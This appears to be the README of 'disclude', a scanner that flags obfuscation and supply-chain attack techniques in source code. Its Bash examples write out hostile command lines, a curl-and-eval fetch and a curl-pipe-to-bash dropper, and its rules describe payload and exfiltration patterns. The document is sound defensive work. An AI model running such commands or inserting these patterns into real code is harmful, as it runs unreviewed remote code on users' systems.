
Detect obfuscation in source code packages.


disclude

Scan a source tree (C, Rust, Python, TypeScript, JavaScript, Bash/Shell) for signs that code is hiding its intent from a human reader: Unicode attacks, encoded payloads, dynamic execution patterns, and build-time escape hatches. This is not a general-purpose vulnerability scanner; it surfaces the techniques used to make malicious code look benign on review.

Implemented in multi-threaded Rust. Useful for both humans and AI agents: it finds the areas that need examination faster (and more cheaply) than a full code scan.

Install

pip install disclude

Usage

disclude scan <path> [options]
Flag             Default  Description
--format         human    Output format: human, json, sarif
--severity       warn     Minimum severity to report: info, warn, critical
--exit-code      off      Exit 1 if any findings at or above threshold
--diff <ref>              Annotate findings introduced since a git ref (main, a tag, a SHA)
--lang <lang>    auto     Override language detection: python, rust, ts, js, c, bash/sh/shell
--ignore <file>           Additional ignore file (gitignore syntax)
--no-raw                  Skip raw byte analysis
--no-token                Skip token-level analysis
--no-ast                  Skip AST analysis (faster, less precise)

Examples

# Human-readable report, warn and above
disclude scan ./my-package

# SARIF output for GitHub Code Scanning
disclude scan ./my-package --format sarif > results.sarif

# CI gate: fail if any critical finding
disclude scan ./my-package --severity critical --exit-code

# Review only what a PR introduced
disclude scan ./my-package --diff main --exit-code

Output formats

human: coloured terminal output grouped by file.

json: newline-delimited JSON, one object per file. Suitable for further processing.

sarif: SARIF 2.1.0, compatible with GitHub Code Scanning, VS Code SARIF viewer, and most CI platforms. Every signal kind appears in the rules catalog even if no findings were produced.
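
As a minimal sketch of post-processing the json format, the snippet below relies only on what is stated above: one JSON object per line. The field names in the sample (`path`, `findings`, `signal`) are hypothetical placeholders, since the actual schema is not described here.

```python
import json


def parse_ndjson(text):
    """Parse newline-delimited JSON: one object per non-empty line."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            records.append(json.loads(line))
    return records


# Hypothetical sample; the real disclude field names may differ.
sample = (
    '{"path": "a.py", "findings": []}\n'
    '{"path": "b.c", "findings": [{"signal": "unicode-bidi"}]}\n'
)

for record in parse_ndjson(sample):
    print(record["path"], len(record["findings"]))
```

Reading line by line keeps memory use flat on large trees, which is the usual reason to prefer newline-delimited JSON over a single array.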

Languages

Language is detected from file extension or shebang line.

Language    Extensions                    Shebang
Bash/Shell  .sh, .bash, .bsh, .ksh, .zsh  bash, sh, ksh, zsh
C           .c, .h
Python      .py, .pyi                     python
Rust        .rs
TypeScript  .ts, .tsx, .mts, .cts
JavaScript  .js, .jsx, .mjs, .cjs         node, deno, bun
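
The lookup described by this table can be sketched as follows. This is an illustration, not disclude's implementation: the function name, the precedence of extension over shebang, the handling of `env`, and the acceptance of versioned interpreters such as `python3` are all assumptions.

```python
import os

# Extension and shebang names copied from the table above.
EXTENSIONS = {
    "bash": (".sh", ".bash", ".bsh", ".ksh", ".zsh"),
    "c": (".c", ".h"),
    "python": (".py", ".pyi"),
    "rust": (".rs",),
    "typescript": (".ts", ".tsx", ".mts", ".cts"),
    "javascript": (".js", ".jsx", ".mjs", ".cjs"),
}
SHEBANGS = {
    "bash": ("bash", "sh", "ksh", "zsh"),
    "python": ("python",),
    "javascript": ("node", "deno", "bun"),
}


def detect_language(filename, first_line=""):
    """Guess a language from the extension, then from the shebang line."""
    ext = os.path.splitext(filename)[1].lower()
    for lang, exts in EXTENSIONS.items():
        if ext in exts:
            return lang
    if not first_line.startswith("#!"):
        return None
    parts = first_line[2:].split()
    if not parts:
        return None
    prog = os.path.basename(parts[0])
    # Assumption: "#!/usr/bin/env python3" names the interpreter after env.
    if prog == "env" and len(parts) > 1:
        prog = os.path.basename(parts[1])
    for lang, names in SHEBANGS.items():
        for name in names:
            # Assumption: versioned names such as "python3" count as python.
            if prog == name or (lang == "python" and prog.startswith(name)):
                return lang
    return None


print(detect_language("lib.mts"))
print(detect_language("run", "#!/usr/bin/env python3"))
```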

How it works

Each file passes through up to three analysis layers. Later layers refine earlier ones. For example, a base64 blob found in a comment is demoted to info by the token pass because encoded text in comments is common and low-risk.

Raw pass   → byte-level: Unicode codepoints, encoded strings, entropy, line length
Token pass → language-aware: reclassify raw findings by context (identifier / string / comment),
             emit identifier anomalies and string-concat patterns
AST pass   → tree-sitter: function call patterns, build scripts, install hooks

Severity levels: critical (high confidence attack signal), warn (suspicious, review recommended), info (low confidence or expected in some legitimate code).
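
The refinement step can be pictured with a small sketch. The `Finding` type and `token_pass` function are hypothetical names invented for illustration; only the demotion rule itself (a base64 finding outside a string literal becomes info) comes from this document.

```python
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Finding:
    signal: str
    severity: str  # "info", "warn", or "critical"
    context: str   # "unknown", "identifier", "string", or "comment"


def token_pass(finding, context):
    """Attach token context; demote base64 blobs found outside string literals."""
    refined = replace(finding, context=context)
    if finding.signal == "encoding-base64" and context != "string":
        refined = replace(refined, severity="info")
    return refined


# The raw pass sees only bytes, so it reports the blob at warn.
raw = Finding("encoding-base64", "warn", "unknown")

print(token_pass(raw, "comment").severity)  # info
print(token_pass(raw, "string").severity)   # warn
```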

Checks

Unicode obfuscation

These run on every file regardless of language.

Signal Severity Description
unicode-bidi critical Bidirectional control characters (U+202A–U+202E, U+2066–U+2069). The Trojan Source attack class — bidi overrides make code appear to do something different from what it compiles to.
unicode-zero-width warn Zero-width characters (U+200B ZWSP, U+200C ZWNJ, U+200D ZWJ, U+00AD soft hyphen, U+FEFF BOM outside file start). Can silently change identifier names or inject hidden content.
unicode-invisible warn Characters from the Unicode Tags block (U+E0001 LANGUAGE TAG; U+E0020–U+E007F). These are invisible in all common renderers and have no legitimate use in source code. Used in IOCCC 2024 "salmon" to attach invisible suffixes to macro names, making identifiers silently different from what they appear. Demoted to info when found inside string literals or comments.
unicode-mixed-script warn Identifier contains characters from more than one Unicode script (e.g. Cyrillic + Latin). Demoted to info inside strings/comments.
unicode-homoglyph warn Identifier contains characters that are visually indistinguishable from a different ASCII character (e.g. Cyrillic а vs Latin a). Demoted to info inside strings/comments.
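
To make the codepoint ranges concrete, here is a minimal sketch of a raw scan for the first three signals. It uses the ranges listed in the table; the function names are hypothetical, and the context-based demotion to info is left out.

```python
# Codepoint ranges taken from the table above.
BIDI_CONTROLS = set(range(0x202A, 0x202F)) | set(range(0x2066, 0x206A))
ZERO_WIDTH = {0x200B, 0x200C, 0x200D, 0x00AD}
BOM = 0xFEFF


def is_tag_char(cp):
    """True for U+E0001 and U+E0020 through U+E007F (Unicode Tags block)."""
    return cp == 0xE0001 or 0xE0020 <= cp <= 0xE007F


def scan_unicode(text):
    """Return (offset, signal) for each suspicious codepoint in text."""
    findings = []
    for offset, ch in enumerate(text):
        cp = ord(ch)
        if cp in BIDI_CONTROLS:
            findings.append((offset, "unicode-bidi"))
        elif cp in ZERO_WIDTH or (cp == BOM and offset > 0):
            findings.append((offset, "unicode-zero-width"))
        elif is_tag_char(cp):
            findings.append((offset, "unicode-invisible"))
    return findings


# Escapes are used here so the sample itself stays visible in an editor.
sample = "access = 'user\u202e'  # admin\u200b"
print(scan_unicode(sample))
```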

Surrogate escape sequences

Applies to JavaScript and TypeScript string literals only.

Signal Severity Description
unicode-surrogate warn / info \uHHHH escape sequences forming UTF-16 surrogate pairs. JavaScript runtimes recombine adjacent surrogate pairs at runtime: a pair such as \uDB40\uDC41 evaluates to U+E0041 (TAG LATIN CAPITAL LETTER A), an invisible tag character. Warn when the decoded codepoint is a Tags block character; info for other surrogate pairs (e.g. emoji written as \uD83D\uDE00) or orphaned surrogates.
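
The arithmetic behind this check is the standard UTF-16 decoding formula. The sketch below applies it to two pairs: 0xDB40/0xDC41, which lands in the Tags block, and 0xD83D/0xDE00, which is an ordinary emoji. The function names are hypothetical.

```python
def combine_surrogates(high, low):
    """Combine a UTF-16 high/low surrogate pair into one codepoint."""
    if not (0xD800 <= high <= 0xDBFF and 0xDC00 <= low <= 0xDFFF):
        raise ValueError("not a valid surrogate pair")
    return 0x10000 + ((high - 0xD800) << 10) + (low - 0xDC00)


def classify_pair(high, low):
    """warn if the decoded codepoint is a Tags block character, else info."""
    cp = combine_surrogates(high, low)
    in_tags_block = cp == 0xE0001 or 0xE0020 <= cp <= 0xE007F
    return "warn" if in_tags_block else "info"


print(hex(combine_surrogates(0xDB40, 0xDC41)))  # 0xe0041
print(classify_pair(0xDB40, 0xDC41))            # warn
print(classify_pair(0xD83D, 0xDE00))            # info (U+1F600)
```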

Encoded payloads

These run on every file regardless of language.

Signal Severity Description
encoding-base64 warn Base64-shaped blob in a string literal. Threshold: ≥64 chars for unpadded blobs; ≥40 chars when the blob ends with = or == padding (padding is strong evidence of base64 encoding and rules out hex digests and identifiers). Often used to embed payloads or C2 URLs that are decoded and requested at runtime. Demoted to info outside string literals.
encoding-hex warn Long run of \xNN hex escape sequences in a string literal. A common way to embed shellcode or obfuscated text. Demoted to info outside string literals.
encoding-octal warn Long run of \NNN octal escape sequences (≥6 consecutive, minimum entropy 2.5 bits/byte). Octal is less recognizable than hex and is valid in C, Python, and non-strict JavaScript string literals; it is used to encode arbitrary bytes or hide printable characters (\101 for A, \012 for newline). Demoted to info outside string literals.
encoding-escape-soup warn Dense mix of arbitrary escape sequences. Indicates content that has been serialized or obfuscated to avoid plain-text grep.
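
The two length thresholds for encoding-base64 can be illustrated with a short sketch. The regular expression and function name are assumptions made for this example, as is the choice to count the padding characters toward the length; the tool's actual matcher may differ.

```python
import base64
import re

# A run of base64 alphabet characters with up to two padding characters.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def looks_like_base64(literal):
    """Apply the thresholds: >=40 chars if padded, >=64 chars if unpadded."""
    for match in BASE64_RUN.finditer(literal):
        blob = match.group(0)
        padded = blob.endswith("=")
        if padded and len(blob) >= 40:
            return True
        if not padded and len(blob) >= 64:
            return True
    return False


padded = base64.b64encode(b"x" * 28).decode()    # 40 chars, ends with "=="
unpadded = base64.b64encode(b"x" * 45).decode()  # 60 chars, no padding
print(looks_like_base64(padded), looks_like_base64(unpadded))  # True False
```

The lower threshold for padded blobs reflects the reasoning in the table: padding removes the ambiguity with hex digests and long identifiers, so a shorter run is enough.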

Code structure anomalies

These run on every file regardless of language.

Signal Severity Description
high-complexity warn String literal with unusually high Shannon entropy (it compresses poorly). Raw high-entropy data in source is often an encoded payload or embedded binary.
long-line info Line length exceeds threshold in a file that is not a minified bundle. Lines dominated (>80%) by string/comment content are suppressed — the signal targets long code lines, which are a common obfuscation tactic.
whitespace-anomaly warn Unusual whitespace in indentation (e.g. mixed tabs/spaces, non-standard whitespace characters), or — for C — decorative internal whitespace layout where ≥ 30 % of lines have ≥ 2 runs of ≥ 4 spaces between code tokens. The decorative trigger catches IOCCC-style code that has been padded into rectangles, diamonds, or other visual shapes. Two structural-alignment filters suppress switch/case tables (one starting keyword dominates) and column-aligned data arrays (run-start columns cluster at a few fixed positions).
narrow-file-charset warn The file's entire printable non-whitespace character vocabulary fits within ≤ 12 distinct ASCII characters (minimum 200 bytes of content). JSFuck uses exactly 6 characters (!()+[]) to encode arbitrary JavaScript using type coercion — the resulting file has no readable identifiers, strings, or keywords. The message names the characters found.
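
Two of these measurements are easy to reproduce. The sketch below computes Shannon entropy per character and applies the narrow-file-charset limits (≤ 12 distinct ASCII characters, at least 200 bytes). The function names are hypothetical, and measuring the 200-byte minimum over the whole file including whitespace is an assumption.

```python
import math
from collections import Counter


def shannon_entropy(data):
    """Shannon entropy in bits per symbol."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def narrow_charset(text, max_chars=12, min_bytes=200):
    """Return the sorted vocabulary if the text fits the rule, else None."""
    if len(text.encode("utf-8")) < min_bytes:
        return None
    vocab = {ch for ch in text if not ch.isspace() and ch.isprintable()}
    if vocab and len(vocab) <= max_chars and all(ord(ch) < 128 for ch in vocab):
        return sorted(vocab)
    return None


# JSFuck-style content built from the six characters named above.
print(narrow_charset("[]()!+" * 40))
print(round(shannon_entropy("abcd"), 3))
```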

Identifier anomalies

Token pass; language-aware.

Signal Severity Description
identifier-narrow-charset warn Identifier composed entirely of visually confusable characters (l, I, 1, O, 0). Names like lI1O0lI are unreadable by design.
identifier-low-length info File-wide naming-shape signal. Fires when the mean non-conventional identifier length is below 2.0 over at least 20 identifiers, or when ≥ 40 % of non-conventional identifiers are exactly one character (over at least 30 identifiers). The second trigger catches IOCCC-style obfuscation where a sprinkling of long keywords (extern, nanosleep, TIOCGWINSZ) inflates the mean above 2.0 even though most globals and functions are single letters.
string-concat-construction warn String concatenation that reconstructs a sensitive identifier (exec, eval, import, getattr, system, require, etc.). A common pattern to dodge static keyword grep.
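
The two identifier-low-length triggers and the confusable-character test reduce to a few lines of arithmetic. In this sketch the input list is assumed to already contain only the "non-conventional" identifiers, since how those are selected is not specified here; the function names are hypothetical.

```python
CONFUSABLE = set("lI1O0")


def narrow_identifier(name):
    """True if every character is one of l, I, 1, O, 0."""
    return bool(name) and set(name) <= CONFUSABLE


def low_length_signal(identifiers):
    """Apply both identifier-low-length triggers to a list of names."""
    n = len(identifiers)
    if n == 0:
        return False
    mean_len = sum(len(name) for name in identifiers) / n
    single_fraction = sum(1 for name in identifiers if len(name) == 1) / n
    mean_trigger = n >= 20 and mean_len < 2.0
    single_trigger = n >= 30 and single_fraction >= 0.40
    return mean_trigger or single_trigger


# Long names lift the mean to 5.8, but 40% single letters still fires.
mixed = ["a"] * 12 + ["nanosleep"] * 18
print(low_length_signal(mixed))       # True
print(narrow_identifier("lI1O0lI"))   # True
```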

Dynamic execution — Python

AST pass; tree-sitter.

Signal Severity Description
dynamic-execution critical / warn exec() or eval() called with a non-literal argument (critical), or with a literal (warn). Also fires when a decoded value reaches compile().
dynamic-import warn __import__() or importlib.import_module() called with a non-literal specifier.
dynamic-attribute warn getattr(obj, name) where name is not a string literal — runtime-resolved attribute lookup.
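
The literal versus non-literal distinction can be demonstrated with Python's standard `ast` module. This is a stand-in for illustration only: disclude uses tree-sitter, and the function below is hypothetical and covers just the exec()/eval() case.

```python
import ast


def find_dynamic_execution(source):
    """Return (line, name, severity) for exec()/eval() calls in Python source."""
    findings = []
    # ast.parse only parses the source; nothing is executed.
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if not (isinstance(func, ast.Name) and func.id in ("exec", "eval")):
            continue
        if not node.args:
            continue
        first = node.args[0]
        literal = isinstance(first, ast.Constant) and isinstance(
            first.value, (str, bytes)
        )
        findings.append((node.lineno, func.id, "warn" if literal else "critical"))
    return sorted(findings)


sample = "eval('1 + 1')\nexec(payload)\n"
print(find_dynamic_execution(sample))
# [(1, 'eval', 'warn'), (2, 'exec', 'critical')]
```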

Dynamic execution — TypeScript / JavaScript

AST pass; tree-sitter.

Signal Severity Description
dynamic-execution critical / warn / info eval(), new Function(), or setTimeout/setInterval called with a string argument (critical/warn). atob(x) — base64 decode at runtime (warn); the first step of the classic supply-chain pattern: store C2 URL or payload as a base64 literal, decode it, then fetch or exec. btoa(x) — base64 encode at runtime (info); used in exfiltration patterns.
dynamic-import warn require(expr) where expr is not a string literal, or import(`...${expr}...`) template.
dynamic-attribute warn process.binding(name) — Node.js internal binding escape hatch, reaches C++ internals not exposed through the public API.

Dynamic execution — Bash/Shell

AST pass; tree-sitter.

Signal Severity Description
dynamic-execution critical / warn eval called with a dynamic argument — variable expansion (eval "$VAR"), command substitution (eval $(cmd)), or a word containing variable references (critical). eval called with a plain string literal (warn). Also fires when exec is called with a variable as the binary path (exec $cmd), since the executed binary is unknown statically (critical).
dynamic-import warn source $path or . $path where the path contains a variable — the sourced file is determined at runtime.
dynamic-execution (pipeline) warn A pipeline ending with bash, sh, ksh, or zsh — the classic "pipe to shell" dropper pattern (curl … | bash). Downloads and immediately executes arbitrary code without inspection.

Examples:

# CRITICAL — dynamic value reaches eval
PAYLOAD=$(curl -s https://example.com/update.sh)
eval "$PAYLOAD"

# CRITICAL — exec with variable binary path
exec $USER_SUPPLIED_BIN

# WARN — source with variable path
source $CONFIG_DIR/init.sh

# WARN — classic pipe-to-shell dropper
curl -fsSL https://example.com/install.sh | bash
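
The pipe-to-shell rule can be approximated on a single command line with the standard `shlex` module. This is a rough sketch rather than the tool's method (disclude works on a tree-sitter parse); the function name is hypothetical, and wrappers such as `sudo bash` are deliberately not handled.

```python
import shlex

SHELLS = {"bash", "sh", "ksh", "zsh"}


def ends_in_shell(command):
    """True if the last stage of a one-line pipeline runs bash, sh, ksh, or zsh."""
    # punctuation_chars=True makes "|" and "||" come out as separate tokens.
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    tokens = list(lexer)
    if "|" not in tokens:
        return False
    last_pipe = len(tokens) - 1 - tokens[::-1].index("|")
    last_stage = tokens[last_pipe + 1:]
    # Compare the basename so that /bin/sh matches as well as sh.
    return bool(last_stage) and last_stage[0].rsplit("/", 1)[-1] in SHELLS


print(ends_in_shell("curl -fsSL https://example.com/install.sh | bash"))  # True
print(ends_in_shell("make || sh fallback.sh"))                            # False
```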

Dynamic execution — C

AST pass; tree-sitter.

Signal Severity Description
dynamic-execution critical / warn system(cmd) or exec*(path, ...) (execl, execlp, execle, execv, execvp, execve) or popen(cmd, mode). Critical when the argument is a variable; warn when it is a string literal.
dynamic-import warn dlopen(path, flags) with a non-literal path — dynamically loads a shared library.
dynamic-attribute warn dlsym(handle, name) with a non-literal symbol name — resolves a function pointer by name at runtime.

C-specific obfuscation

Signal Severity Description
macro-alias warn Token pass. #define <name> <replacement> where the macro name is 1–2 characters and the replacement is a sensitive identifier (write, read, open, system, exec*, popen, fork, kill, ptrace, syscall, dlopen, dlsym, mmap, mprotect, socket, connect, send, recv, …). A common dropper trick: the syscall is renamed to a single letter so that simple keyword grep over the source misses it. Function-like macros and multi-token bodies are excluded.
macro-keyword-override warn Token pass. #define <keyword> <body> where <keyword> is a reserved pre-C11 keyword (int, char, double, union, for, return, …) and the replacement body is non-empty. Rebinding a keyword silently changes what every later occurrence in the file means — an IOCCC favourite (#define double(a,b) int, #define union static struct). C11+ pseudo-keywords (_Static_assert, _Generic, _Atomic, _Alignas, _Alignof, _Thread_local, _Noreturn) are excluded because real codebases routinely polyfill them. Empty-body shims (#define inline) are excluded.
identifier-confusable-collision warn Token pass. Two distinct identifiers in the same file collapse to the same visual skeleton after grouping confusable characters — round-O 0/O/o and vertical-stroke 1/l/I (lowercase i is excluded; its dot makes it visually distinct). Fires only when at least one position differs as digit-vs-letter (_0 vs _O, x0 vs xO); pure case-pair collisions like Object/object are excluded as a common C convention rather than the IOCCC digit-letter swap.
numeric-literal-payload critical AST pass. A wide-numeric array (≥ 8 elements of short, int, long, long long, float, double, long double, wchar_t, size_t, int16_t/int32_t/int64_t, uint16_t/uint32_t/uint64_t, intptr_t, uintptr_t, …) that is later reinterpreted through a byte-pointer cast (char *, unsigned char *, signed char *, int8_t *, uint8_t *). Hides arbitrary bytes inside what looks like a table of floating-point or integer constants. Findings are deduped per array — one report per array citing the cast count.
format-string-write critical Token pass. printf-family format string contains a %n write directive (%n, %hhn, %hn, %ln, %lln, with optional positional %<digit>$…n). The n conversion writes the byte-count-so-far into an int * argument — a memory write primitive seen almost exclusively in CTF/exploit code and IOCCC entries. Detected inside string literals and inside #define macro bodies (catches the IOCCC stringification trick #define N(a) "%"#a"$hhn", where the $hhn directive tail is split across stringification). Comments mentioning %n are excluded — both standalone and embedded /* ... */ / // ... inside #define lines.
legacy-k-and-r-main warn AST pass. main() defined without an explicit return type, in pre-ANSI K&R style (main() { ... } or main(argc, argv) int argc; char **argv; { ... }). Modern C requires int main(...); implicit int was removed from the language in C99, so this form is a strong indicator of intentionally archaic source (IOCCC entries) or pre-C99 code.
implicit-int-function warn AST pass. Three or more functions in the same file are defined without an explicit return type (pre-ANSI K&R implicit-int). Catches IOCCC sources where every function is shaped Q(a){return a;}. The single-function main() form is reported by legacy-k-and-r-main; this signal is the file-wide pattern.
dynamic-format-string warn AST pass. A printf-family call (printf, fprintf, dprintf, sprintf, snprintf, asprintf, and the w-wide variants) uses a non-literal format string — the classic format-string-bug shape. The v* variadic forwarders are excluded by design. Bare-identifier format args that resolve to a parameter or local variable of the enclosing function are excluded (legitimate format selection). SCREAMING_SNAKE_CASE names are treated as macro-defined formats and excluded, as are i18n wrappers (_(...), gettext(...), dgettext, ngettext, …).
embedded-nul-in-string warn Token pass. A C string literal contains an embedded NUL escape (\0, \00, \000, \x00) followed by additional non-whitespace bytes. libc string functions truncate at the NUL while the trailing bytes remain accessible through memcpy/length-bearing APIs — a stealth payload pattern, and an IOCCC technique for stuffing extra data into a string that still looks short.
reverse-subscript-notation warn AST pass. Two shapes of the C a[b] ≡ b[a] trick: (1) a subscript_expression whose left operand is a numeric literal (2[arr] instead of arr[2]), caught directly when the surrounding parse is clean; (2) a #define <name> [<expr>] macro whose body is a bare bracketed fragment, used to splice a reverse subscript at every call site (#define q [v+a], so that 2 q expands to 2[v+a]). Real code essentially never indexes a pointer with the integer on the left. Subscripts inside ERROR parser-recovery contexts are excluded.
recursive-main-call warn AST pass. main is called from inside another function in the same TU — recursion through main is an IOCCC pattern (loop using argc/argv to thread state). The runtime is the only legitimate caller of main. The K&R main() { ... } definition shape (where tree-sitter wraps the bare signature in an ERROR containing a call_expression) is excluded so the implicit-int main definition isn't misread as a self-call.
stringify-dereference warn AST pass. A function-like macro body contains *#param — the # operator stringifies the macro argument into a string literal, and the leading * dereferences it to extract the first byte. A one-character literal extraction trick used in IOCCC code (e.g. *c == *#v to compare a runtime char against the first letter of a macro-arg token). Token paste ## is excluded.
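
The identifier-confusable-collision rule from this table lends itself to a short sketch. The skeleton mapping follows the two groups named in that row (0/O/o and 1/l/I); the function names are hypothetical, and the tool's real skeleton table may be larger.

```python
from itertools import combinations

ROUND = set("0Oo")
STROKE = set("1lI")


def skeleton(name):
    """Collapse confusable characters to one representative per group."""
    out = []
    for ch in name:
        if ch in ROUND:
            out.append("O")
        elif ch in STROKE:
            out.append("l")
        else:
            out.append(ch)
    return "".join(out)


def digit_letter_swap(a, b):
    """True if a and b share a skeleton and differ somewhere as digit vs letter."""
    if a == b or len(a) != len(b) or skeleton(a) != skeleton(b):
        return False
    return any(x != y and x.isdigit() != y.isdigit() for x, y in zip(a, b))


def collisions(identifiers):
    """Return colliding pairs among the distinct identifiers of one file."""
    names = sorted(set(identifiers))
    return [(a, b) for a, b in combinations(names, 2) if digit_letter_swap(a, b)]


# Object/object share a skeleton but differ only by case, so they are skipped.
print(collisions(["x0", "xO", "Object", "object"]))  # [('x0', 'xO')]
```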

Build-time and install-time

AST pass; language-specific.

Signal Severity Description
build-script-shellout critical Rust build.rs spawns a shell command or makes a network request at compile time. Malicious build scripts are a known supply-chain vector — they run automatically during cargo build. Also elevated to critical when found alongside unsafe code in the same file.
proc-macro-presence info Rust crate defines a procedural macro (proc-macro = true). Proc-macros run arbitrary code at compile time with the privileges of the user running the build. Informational: legitimate proc-macros are common, but they warrant extra scrutiny in untrusted dependencies.
install-hook-shellout warn package.json preinstall/postinstall/install script shells out to a non-trivial command. Runs automatically on npm install.
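
For the npm case, the scripts in question are easy to list by hand. The sketch below reads a package.json document and returns its install-time hooks; it does not try to judge whether a command is "non-trivial", because that criterion is not defined here. The function name is hypothetical.

```python
import json

# npm lifecycle scripts that run automatically during npm install.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def install_hooks(package_json_text):
    """Return {hook: command} for install-time scripts in a package.json document."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


sample = '{"name": "demo", "scripts": {"postinstall": "node setup.js", "test": "jest"}}'
print(install_hooks(sample))  # {'postinstall': 'node setup.js'}
```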

What's new

1.2.0

Updates to the public interface.

1.1.0

Updates to the public interface.

1.0.0

Initial release.
